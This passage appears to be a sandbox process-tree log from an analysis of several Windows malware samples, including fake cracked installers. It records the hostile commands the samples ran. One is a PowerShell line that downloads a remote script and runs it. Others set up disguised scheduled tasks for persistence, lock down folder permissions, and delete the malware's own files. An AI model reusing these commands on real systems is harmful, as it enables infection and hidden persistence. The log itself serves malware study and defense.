PID:4944

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\dc52a975-17fb-4d79-8a44-d7eb4cd2e340\build2.exe" & exit
7⤵
PID:5656

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:5724

C:\Users\Admin\AppData\Local\dc52a975-17fb-4d79-8a44-d7eb4cd2e340\build3.exe
"C:\Users\Admin\AppData\Local\dc52a975-17fb-4d79-8a44-d7eb4cd2e340\build3.exe"
5⤵
PID:4780

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
6⤵
- Creates scheduled task(s)
PID:1180

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:812

C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe"
1⤵
- Executes dropped EXE
PID:496

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
"C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\animecool.exe
2⤵
PID:6556

C:\Users\Admin\AppData\Local\Temp\animecool.exe
C:\Users\Admin\AppData\Local\Temp\animecool.exe
3⤵
PID:7616

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
PID:6064

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
"C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
2⤵
PID:8180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
3⤵
PID:7796

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
nig1r21312312.exe exec hide fds333333333333333.bat
4⤵
PID:6256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c fds333333333333333.bat
5⤵
PID:7192

C:\Windows\SysWOW64\timeout.exe
timeout 60
6⤵
- Delays execution with timeout.exe
PID:5856

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
"C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
2⤵
PID:7536

C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
3⤵
PID:7016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
PID:5672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdfsfs3wefdsfsdfsd.bat" "
5⤵
PID:5116

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
nig1r21312312.exe exec hide nig1r21312312.exe exec hide cock123123444.bat
6⤵
PID:7664

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
nig1r21312312.exe exec hide cock123123444.bat
7⤵
PID:4860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cock123123444.bat
8⤵
PID:7876

C:\Users\Admin\AppData\Local\Temp\MisakaMikoto213213.exe
MisakaMikoto213213.exe
9⤵
PID:7356

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
10⤵
PID:7244

C:\Users\Admin\AppData\Local\Temp\cockcreator.exe
cockcreator.exe
9⤵
PID:7840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --enable-features=NetworkServiceInProcess2 --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-dev-shm-usage --disable-features=Translate,BackForwardCache,AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --enable-blink-features=IdleDetection --export-tagged-pdf --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-QnN1NR --headless --hide-scrollbars --mute-audio about:blank --disable-blink-features=AutomationControlled --remote-debugging-port=0
10⤵
PID:9168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-QnN1NR /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-QnN1NR\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-QnN1NR --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xdc,0xe0,0xe4,0xb8,0xe8,0x7ffe925f9758,0x7ffe925f9768,0x7ffe925f9778
11⤵
PID:9128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1160 --field-trial-handle=1324,i,6515571251950318532,5142640916098971596,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:2
11⤵
PID:8156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=1892 --field-trial-handle=1324,i,6515571251950318532,5142640916098971596,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
11⤵
PID:6476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2248 --field-trial-handle=1324,i,6515571251950318532,5142640916098971596,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
11⤵
PID:7004

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3448

C:\Users\Admin\AppData\Local\Temp\is-8ONAQ.tmp\is-EQJB1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8ONAQ.tmp\is-EQJB1.tmp" /SL4 $50396 "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:1540

C:\Program Files (x86)\FJBsoftFR\FRec323\FRec323.exe
"C:\Program Files (x86)\FJBsoftFR\FRec323\FRec323.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3708

C:\Users\Admin\AppData\Roaming\{6caee1a8-b190-11ed-8e2c-806e6f6e6963}\j1SnXvpi0.exe
4⤵
- Executes dropped EXE
PID:1048

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "FRec323.exe" /f & erase "C:\Program Files (x86)\FJBsoftFR\FRec323\FRec323.exe" & exit
4⤵
PID:5832

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "FRec323.exe" /f
5⤵
- Kills process with taskkill
PID:5912

C:\Users\Admin\Desktop\New folder\HeInstaller\fb94349c162808651fb84b58e6881eb0.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\fb94349c162808651fb84b58e6881eb0.exe"
1⤵
PID:1732

C:\Users\Admin\Desktop\New folder\HeInstaller\fb94349c162808651fb84b58e6881eb0.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\fb94349c162808651fb84b58e6881eb0.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3420

C:\Users\Admin\Desktop\New folder\HeInstaller\Driver Easy Pro Crack..exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Driver Easy Pro Crack..exe"
1⤵
- Executes dropped EXE
PID:2808

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
2⤵
PID:4372

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -h
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3524

C:\Users\Admin\AppData\Local\Temp\RarSFX0\brg.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\brg.exe"
2⤵
PID:1452

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
3⤵
PID:1612

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
3⤵
PID:368

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
3⤵
PID:2592

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
3⤵
PID:5116

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
3⤵
PID:2572

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
3⤵
PID:2772

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
3⤵
PID:2920

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
3⤵
PID:4152

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1732

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
3⤵
PID:616

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
3⤵
PID:4212

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
3⤵
PID:1468

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
3⤵
PID:1520

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
3⤵
- Executes dropped EXE
PID:4780

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
3⤵
PID:2216

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
3⤵
PID:1180

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
3⤵
PID:2908

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
3⤵
PID:1844

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
3⤵
PID:2800

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
3⤵
PID:1352

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
3⤵
PID:2036

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
3⤵
PID:2604

C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe"
2⤵
PID:3440

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')"
3⤵
PID:1612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')
4⤵
PID:388

C:\ProgramData\CBD.tmp.exe
"C:\ProgramData\CBD.tmp.exe"
3⤵
PID:4348

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe" >> NUL
3⤵
PID:1744

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:6036

C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe"
2⤵
PID:3272

C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe"
2⤵
PID:5364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 520
3⤵
- Program crash
PID:4364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 788
3⤵
- Program crash
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 852
3⤵
- Program crash
PID:6436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 868
3⤵
- Program crash
PID:8088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 880
3⤵
- Program crash
PID:7984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 924
3⤵
- Program crash
PID:6560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 1112
3⤵
- Program crash
PID:7952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 1152
3⤵
- Program crash
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 1300
3⤵
- Program crash
PID:1560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "lower.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe" & exit
3⤵
PID:6272

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "lower.exe" /f
4⤵
- Kills process with taskkill
PID:5536

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss29.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss29.exe"
2⤵
PID:5736

C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196 (3).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196 (3).exe"
1⤵
PID:1788

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zitV0071.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zitV0071.exe
2⤵
PID:1848

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\jr866572.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\jr866572.exe
3⤵
PID:1332

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ku834241.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ku834241.exe
3⤵
PID:704

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:1180

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
PID:1468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k WspService
1⤵
PID:4172

C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe"
1⤵
PID:3812

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
2⤵
PID:5192

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\DesktopWindowsHolographicDevices-type1.9.4.9" /inheritance:e /deny "admin:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:496

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\DesktopWindowsHolographicDevices-type1.9.4.9" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:5620

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\DesktopWindowsHolographicDevices-type1.9.4.9" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:5740

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /CREATE /TN "DesktopWindowsHolographicDevices-type1.9.4.9\DesktopWindowsHolographicDevices-type1.9.4.9" /TR "C:\ProgramData\DesktopWindowsHolographicDevices-type1.9.4.9\DesktopWindowsHolographicDevices-type1.9.4.9.exe" /SC MINUTE
3⤵
- Creates scheduled task(s)
PID:5868

C:\ProgramData\DesktopWindowsHolographicDevices-type1.9.4.9\DesktopWindowsHolographicDevices-type1.9.4.9.exe
"C:\ProgramData\DesktopWindowsHolographicDevices-type1.9.4.9\DesktopWindowsHolographicDevices-type1.9.4.9.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:7240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3812 -s 132
2⤵
- Program crash
PID:4496

C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe"
1⤵
PID:5372

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
2⤵
PID:2180

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2" /inheritance:e /deny "admin:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:7664

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:4408

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:6644

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /CREATE /TN "SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2" /TR "C:\ProgramData\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2.exe" /SC MINUTE
3⤵
- Creates scheduled task(s)
PID:2864

C:\ProgramData\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2.exe
"C:\ProgramData\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2\SoftwareDistributionregid.1991-06.com.microsoft-type6.6.0.2.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:6304

C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe"
1⤵
PID:5400

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
2⤵
PID:6628

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\OracleAdobe-type5.0.3.9" /inheritance:e /deny "admin:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:2804

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\OracleAdobe-type5.0.3.9" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:5080

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\OracleAdobe-type5.0.3.9" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:7416

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /CREATE /TN "OracleAdobe-type5.0.3.9\OracleAdobe-type5.0.3.9" /TR "C:\ProgramData\OracleAdobe-type5.0.3.9\OracleAdobe-type5.0.3.9.exe" /SC MINUTE
3⤵
- Creates scheduled task(s)
PID:5332

C:\ProgramData\OracleAdobe-type5.0.3.9\OracleAdobe-type5.0.3.9.exe
"C:\ProgramData\OracleAdobe-type5.0.3.9\OracleAdobe-type5.0.3.9.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:6296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5400 -s 148
2⤵
- Program crash
PID:7228

C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe"
1⤵
PID:5356

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
2⤵
PID:6020

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1" /inheritance:e /deny "admin:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:7124

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:7904

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:5864

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /CREATE /TN "WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1" /TR "C:\ProgramData\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1.exe" /SC MINUTE
3⤵
- Creates scheduled task(s)
PID:6360

C:\ProgramData\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1.exe
"C:\ProgramData\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1\WindowsHolographicDevicesWindowsHolographicDevices-type9.9.4.1.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:5068

C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe"
1⤵
PID:5276

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
2⤵
PID:5732

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\WindowsHolographicDevicesUSOPrivate-type9.8.5.4" /inheritance:e /deny "admin:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:6156

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\WindowsHolographicDevicesUSOPrivate-type9.8.5.4" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:5340

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\WindowsHolographicDevicesUSOPrivate-type9.8.5.4" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:4064

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /CREATE /TN "WindowsHolographicDevicesUSOPrivate-type9.8.5.4\WindowsHolographicDevicesUSOPrivate-type9.8.5.4" /TR "C:\ProgramData\WindowsHolographicDevicesUSOPrivate-type9.8.5.4\WindowsHolographicDevicesUSOPrivate-type9.8.5.4.exe" /SC MINUTE
3⤵
- Creates scheduled task(s)
PID:3220

C:\ProgramData\WindowsHolographicDevicesUSOPrivate-type9.8.5.4\WindowsHolographicDevicesUSOPrivate-type9.8.5.4.exe
"C:\ProgramData\WindowsHolographicDevicesUSOPrivate-type9.8.5.4\WindowsHolographicDevicesUSOPrivate-type9.8.5.4.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:616

